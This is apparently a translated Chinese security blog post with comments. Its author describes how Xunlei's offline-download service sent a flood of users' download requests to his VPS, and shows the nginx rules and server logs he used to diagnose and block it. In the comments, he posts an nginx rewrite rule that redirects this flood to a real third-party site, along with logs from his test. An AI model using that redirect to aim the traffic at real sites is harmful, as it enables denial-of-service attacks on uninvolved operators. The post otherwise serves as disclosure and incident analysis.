Hijacking users of Xunlei Cloud, Baidu Cloud and similar services to launch large-scale DDoS attacks

admin 8 months ago 197

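How it started

Last week, a fairly well-known film was said to be out in a complete, non-cam version, so one day I found a download link on a certain "Tiantang" site. The link was dead, though. A friend gave me a Xunlei member account, so I decided to check whether it was a cam rip. I pasted the Tiantang address in and, sure enough, Xunlei had already cached it. I then tried Xunlei's quick-play feature, but it reported a source address error and quick play was unavailable.

The VPS hosting my blog had plenty of traffic left (less than 3G of 500G used), so I downloaded the film with the VPS and then had Xunlei's offline download fetch it from my blog's address.

While Xunlei was doing the offline download, the VPS's outbound traffic was fairly steady, essentially the same as the download speed shown on the offline download page.

All was well. The offline download finished quickly, and I noticed nothing unusual on the VPS at that point.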

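Something is off

After a quick look with quick play: fine, not a cam rip, I was fairly satisfied, so I started downloading it on my home computer.

I also turned on the acceleration channel while I was at it...

Then I noticed a problem: as soon as the download started, the website became unreachable; as soon as I paused it, the site came right back.

At the time I assumed Xunlei was saturating the VPS's outbound bandwidth, so I did not pay much attention.

Jiankongbao sent a server-unavailable alert; I still ignored it.

I went back to my homework.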

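Something is wrong

After doing homework for a while, a bit more than half an hour, I figured the film had finished downloading. I opened my site on my phone and found it still would not load.

I concluded something must have happened, grudgingly opened the SolusVM panel, and was scared stiff.

Instantaneous outbound traffic had actually reached 40M/S, and 100G of my traffic had been used up...

Sensing that something was not right, I immediately switched to my computer and started dealing with it...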

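DDoS deflate defeated

I have always been in the habit of using DDoS deflate to defend against small-scale attacks.

I checked iptables -L; not many IPs had been banned, so I lowered the threshold, but that still did not help.

So I began the painful job of banning by hand, but the effect was still not noticeable, and even after restarting nginx the site would not open.

CPU usage > 85%

Running top showed several php-fpm processes with extremely high usage.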

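Looking for a signature

I pulled the logs down to look; annoyingly, because the system time was wrong, I did not spot the attack signature at first.

It was around 14:00 at the time, but the server's clock said only 9:00.

Painful...

Only when I scrolled to the very bottom did I find large-scale requests to the video's download address, with the suffix rmvb.

So I promptly wrote an nginx rule to return 403 for anything with the rmvb suffix.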

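First results

After banning access to *.rmvb, CPU usage dropped right away and returned to normal.

After rebooting the server, all the websites on it were accessible again.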

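The pain returns

Off to school, off to school...

When I got back today, I found 4G of extra stuff had suddenly appeared. I checked, and I was floored.

The mighty access.log file was taking up 4G of space...

What am I supposed to do with that...

I renamed it, restarted nginx so that a new log was generated, pulled it down and had a look...

Partial log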

121.34.191.96 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; KB974488)"

180.110.85.117 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/[imlonghao-imlonghao.com].\xE8\x87\xB4\xE6\x88\x91\xE4\xBB\xAC\xE7\xBB\x88\xE5\xB0\x86\xE9\x80\x9D\xE5\x8E\xBB\xE7\x9A\x84\xE9\x9D\x92\xE6\x98\xA5.HD.1024x576.\xE5\x9B\xBD\xE8\xAF\xAD\xE4\xB8\xAD\xE5\xAD\x97.rmvb HTTP/1.1" 403 564 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; EIE10;ZHCNMSN)"

110.184.8.46 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/[imlonghao-imlonghao.com].\xE8\x87\xB4\xE6\x88\x91\xE4\xBB\xAC\xE7\xBB\x88\xE5\xB0\x86\xE9\x80\x9D\xE5\x8E\xBB\xE7\x9A\x84\xE9\x9D\x92\xE6\x98\xA5.HD.1024x576.\xE5\x9B\xBD\xE8\xAF\xAD\xE4\xB8\xAD\xE5\xAD\x97.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0E; BRI/2; InfoPath.2; .NET4.0C; youxihe.1437; Media Center PC 6.0; MASP; youxihe.1437)"

61.187.6.123 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/[imlonghao-imlonghao.com].\xD6\xC2\xCE\xD2\xC3\xC7\xD6\xD5\xBD\xAB\xCA\xC5\xC8\xA5\xB5\xC4\xC7\xE0\xB4\xBA.HD.1024x576.\xB9\xFA\xD3\xEF\xD6\xD0\xD7\xD6.rmvb HTTP/1.1" 404 10110 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

61.136.145.119 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 404 10110 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

218.108.168.178 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%E8%87%B4%E6%88%91%E4%BB%AC%E7%BB%88%E5%B0%86%E9%80%9D%E5%8E%BB%E7%9A%84%E9%9D%92%E6%98%A5.HD.1024x576.%E5%9B%BD%E8%AF%AD%E4%B8%AD%E5%AD%97.rmvb HTTP/1.1" 404 10110 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"

180.110.85.117 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; EIE10;ZHCNMSN)"

113.120.105.197 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%E8%87%B4%E6%88%91%E4%BB%AC%E7%BB%88%E5%B0%86%E9%80%9D%E5%8E%BB%E7%9A%84%E9%9D%92%E6%98%A5.HD.1024x576.%E5%9B%BD%E8%AF%AD%E4%B8%AD%E5%AD%97.rmvb HTTP/1.1" 404 10110 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

59.56.115.134 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)"

61.131.97.40 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MATP; Media Center PC 6.0)"

114.83.179.112 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/[imlonghao-imlonghao.com].\xD6\xC2\xCE\xD2\xC3\xC7\xD6\xD5\xBD\xAB\xCA\xC5\xC8\xA5\xB5\xC4\xC7\xE0\xB4\xBA.HD.1024x576.\xB9\xFA\xD3\xEF\xD6\xD0\xD7\xD6.rmvb HTTP/1.1" 404 10110 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; youxihe.1577)"

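Even though 403 was returned, traffic arriving N times per second from different places still hurts, doesn't it...

I temporarily disabled logging...

and deleted that big 4G log...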
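The log excerpt above spells one file name three ways (percent-encoded GBK, percent-encoded UTF-8, and nginx's `\xNN` escapes for raw bytes), so counting hits per raw URI undercounts the flood. The following is an added example, not code from the original post: it folds those spellings into one path and reports paths requested by many distinct addresses. The function names, the threshold and the sample lines (documentation-range addresses, a made-up file name) are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import quote, unquote_to_bytes

# nginx "combined" format: ip - user [time] "METHOD uri proto" status bytes ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# nginx writes non-ASCII request bytes to the access log as \xNN
NGINX_HEX = re.compile(r'\\x([0-9A-Fa-f]{2})')


def canonical_path(uri):
    """Fold %NN and \\xNN spellings, in GBK or UTF-8, into one readable path."""
    path = uri.split("?", 1)[0]
    path = NGINX_HEX.sub(r'%\1', path)      # \xE7 -> %E7
    raw = unquote_to_bytes(path)            # %E7 -> byte 0xE7
    for encoding in ("utf-8", "gbk"):       # GBK bytes of CJK text are not valid UTF-8
        try:
            return raw.decode(encoding)
        except UnicodeDecodeError:
            pass
    return raw.decode("latin-1")            # last resort, never fails


def find_hot_paths(lines, min_ips=20):
    """Return paths hit by at least min_ips distinct clients, busiest first.

    Per-second buckets use the log's own timestamps, so a wrong server
    clock shifts the times but not the counts.
    """
    stats = defaultdict(lambda: {"requests": 0, "ips": set(), "bytes": 0,
                                 "per_second": defaultdict(int)})
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        entry = stats[canonical_path(m.group("uri"))]
        entry["requests"] += 1
        entry["ips"].add(m.group("ip"))
        entry["per_second"][m.group("ts")] += 1
        if m.group("size").isdigit():
            entry["bytes"] += int(m.group("size"))   # 403 bodies still cost bandwidth
    report = []
    for path, entry in stats.items():
        if len(entry["ips"]) >= min_ips:
            report.append({
                "path": path,
                "requests": entry["requests"],
                "distinct_ips": len(entry["ips"]),
                "peak_rps": max(entry["per_second"].values()),
                "bytes_sent": entry["bytes"],
            })
    return sorted(report, key=lambda r: r["requests"], reverse=True)


def sample_log():
    """Constructed sample: 30 clients fetch one file, spelled three ways."""
    name = "电影"  # made-up file name
    spellings = [
        "/uploads/" + quote(name.encode("gbk")) + ".rmvb",
        "/uploads/" + quote(name.encode("utf-8")) + ".rmvb",
        "/uploads/" + "".join("\\x%02X" % b for b in name.encode("utf-8")) + ".rmvb",
    ]
    lines = []
    for i in range(30):
        lines.append(
            '198.51.100.%d - - [24/May/2013:19:28:%02d +0800] '
            '"GET %s HTTP/1.1" 403 564 "-" "Mozilla/4.0"'
            % (i + 1, 42 + i // 15, spellings[i % 3])
        )
    for _ in range(3):  # ordinary traffic from one visitor
        lines.append(
            '203.0.113.7 - - [24/May/2013:19:28:42 +0800] '
            '"GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"'
        )
    return lines


if __name__ == "__main__":
    for row in find_hot_paths(sample_log()):
        print(row)
```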

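The same problem: I have tested Baidu Cloud's offline download and it has this issue too. My earlier post on the site, "Metasploit Devil Training Camp penetration testing PDF download (with attack/defense demo environment)", had attachments totalling 12.5G, all stored on the server. After it was offline-downloaded with Baidu Cloud, N IPs came requesting the download every day, with several hundred G of outbound traffic per day. In the end I could not take it any more, deleted the links outright, and changed the attachment addresses to Baidu Cloud addresses.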

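Afterword

I wondered why so many machines in different places would access this address; apart from me, nobody had been told about it.

It must be Xunlei. The film was quite popular at the time; possibly, during the offline download, the MD5 of the copy fetched from my side matched the MD5 of the film on the Tiantang site, so Xunlei treated me as one of the source addresses. But when users request a download from the offline servers, part of the download requests get redirected to my side.

I picked an IP from the log and looked it up: some broadband ISP, so it should not be an official Xunlei server but a user's machine...

Of course, the above is only my guess; if anything is wrong, please point it out so we can discuss...

Right now this address still gets N requests per second. Just imagine: if this address were rewritten to some site one dislikes, would it cause a CC attack?

If that supposition holds, i.e. after offline-downloading a popular file with your own VPS, part of the download requests come in and are rewritten to someone else's site, wouldn't that amount to a very powerful attack?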


Comments:

1#

imlonghao (imlonghao.com friend link) | 2013-05-24 21:36

Tried rewriting to someone else's site; it lagged within seconds.....

2#

imlonghao (imlonghao.com friend link) | 2013-05-24 21:39

location ~* \.(rmvb)$ {

rewrite ^/ http://www.wooyun.org/searchbug.php?q=%25;

}

3#

insight-labs (Root Yourself in Success) | 2013-05-24 21:42

Does Xunlei follow the rewrite?

4#

insight-labs (Root Yourself in Success) | 2013-05-24 21:44

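@imlonghao

Still, I have to say this idea is extremely dirty

If it does follow the rewrite, then there is enough capital to DDoS the GFW...

5#

xsser (Ten penises come in different lengths!!) | 2013-05-24 21:51

@imlonghao damn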

6#

imlonghao (imlonghao.com friend link) | 2013-05-24 22:02

@insight-labs I'll set up another small site and look at the logs, then we'll know..

7#

imlonghao (imlonghao.com friend link) | 2013-05-24 22:09

@xsser @insight-labs


115.152.100.157 - - [24/May/2013:22:07:30 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)"

58.19.214.162 - - [24/May/2013:22:07:32 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

121.33.190.176 - - [24/May/2013:22:07:33 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)"

58.38.244.43 - - [24/May/2013:22:07:33 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; HPNTDF; Tablet PC 2.0; Media Center PC 6.0; .NET4.0C)"

123.182.10.252 - - [24/May/2013:22:07:34 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MALN; .NET4.0C)"

42.91.206.8 - - [24/May/2013:22:07:34 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

140.255.89.46 - - [24/May/2013:22:07:35 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"

49.84.154.38 - - [24/May/2013:22:07:36 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

117.94.89.30 - - [24/May/2013:22:07:36 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB7.2; QQDownload 718; .NET CLR 2.0.50727)"

222.30.77.7 - - [24/May/2013:22:07:36 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0; MALCJS)"

123.52.144.23 - - [24/May/2013:22:07:36 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 718; .NET4.0C; .NET CLR 2.0.50727)"

61.178.55.28 - - [24/May/2013:22:07:37 +0800] "GET / HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"

61.171.115.42 - - [24/May/2013:22:07:38 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

183.156.53.206 - - [24/May/2013:22:07:38 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

183.31.213.50 - - [24/May/2013:22:07:39 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; 4399Box.720; 4399Box.720)"

124.236.204.239 - - [24/May/2013:22:07:39 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; QQDownload 718; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; 4399Box.778; 4399Box.778; KB974489)"

222.216.57.80 - - [24/May/2013:22:07:39 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"

1.87.220.193 - - [24/May/2013:22:07:40 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

124.239.121.99 - - [24/May/2013:22:07:41 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; InfoPath.2)"

61.171.115.42 - - [24/May/2013:22:07:42 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

183.156.53.206 - - [24/May/2013:22:07:43 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

1.192.93.13 - - [24/May/2013:22:07:44 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C)"

120.37.190.181 - - [24/May/2013:22:07:44 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

218.79.60.165 - - [24/May/2013:22:07:44 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

119.135.133.29 - - [24/May/2013:22:07:44 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MATP; .NET4.0C)"

58.19.214.162 - - [24/May/2013:22:07:46 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

61.131.97.40 - - [24/May/2013:22:07:46 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MATP; Media Center PC 6.0)"

58.214.3.98 - - [24/May/2013:22:07:46 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

113.65.12.212 - - [24/May/2013:22:07:47 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

183.156.53.206 - - [24/May/2013:22:07:51 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

61.178.69.249 - - [24/May/2013:22:07:53 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C)"

183.156.53.206 - - [24/May/2013:22:07:56 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

111.172.197.39 - - [24/May/2013:22:07:58 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

14.220.49.91 - - [24/May/2013:22:07:59 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; KB974489)"

122.194.216.252 - - [24/May/2013:22:08:02 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"

219.131.216.181 - - [24/May/2013:22:08:03 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

218.79.60.165 - - [24/May/2013:22:08:04 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

59.173.203.247 - - [24/May/2013:22:08:05 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

183.156.53.206 - - [24/May/2013:22:08:05 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

115.151.178.14 - - [24/May/2013:22:08:06 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

111.172.197.39 - - [24/May/2013:22:08:06 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

183.156.53.206 - - [24/May/2013:22:08:09 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

61.166.173.50 - - [24/May/2013:22:08:10 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

118.113.201.143 - - [24/May/2013:22:08:10 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)"

117.82.100.71 - - [24/May/2013:22:08:10 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.2; BRI/2)"

115.216.150.146 - - [24/May/2013:22:08:11 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

116.209.229.81 - - [24/May/2013:22:08:12 +0800] "GET /?xl HTTP/1.1" 416 206 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.11)"

111.172.197.39 - - [24/May/2013:22:08:12 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

114.83.213.177 - - [24/May/2013:22:08:13 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MDDC; .NET4.0C)"

183.156.53.206 - - [24/May/2013:22:08:14 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

59.34.36.61 - - [24/May/2013:22:08:14 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"

111.172.197.39 - - [24/May/2013:22:08:16 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

117.92.169.209 - - [24/May/2013:22:08:18 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C)"

218.79.60.165 - - [24/May/2013:22:08:20 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

114.83.89.180 - - [24/May/2013:22:08:21 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

219.150.151.4 - - [24/May/2013:22:08:23 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"

14.117.194.204 - - [24/May/2013:22:08:23 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)"

183.156.53.206 - - [24/May/2013:22:08:24 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

113.89.97.65 - - [24/May/2013:22:08:24 +0800] "GET /?xl HTTP/1.1" 200 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)"

14.153.144.182 - - [24/May/2013:22:08:24 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)"

113.89.97.65 - - [24/May/2013:22:08:25 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)"

